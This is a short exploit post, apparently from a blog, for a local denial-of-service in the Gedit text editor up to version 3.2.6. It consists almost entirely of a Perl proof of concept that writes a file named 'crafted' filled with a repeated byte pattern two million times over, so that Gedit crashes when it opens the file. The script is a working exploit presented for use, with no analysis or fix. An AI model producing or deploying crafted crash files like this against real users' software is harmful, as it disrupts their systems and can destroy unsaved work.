# Exploit Title: Gedit <=3.2.6 Local Denial Of Service
# Date: 06/10/2012 10:40
# Author: 0x414141
# Vendor or Software Link: http://projects.gnome.org/gedit/
# Version: 3.2.6
# Category:: local
# Tested on: Linux Mint
PoC:
#!/usr/bin/perl
my $arquivo = 'crafted';
open(crafted, ">$arquivo");
print crafted "\x41\x42\x01"x2000000;
close(crafted);
print "$arquivo gerado com sucesso.\n";
#nullr00t 2012-2012
Nenhum comentário:
Postar um comentário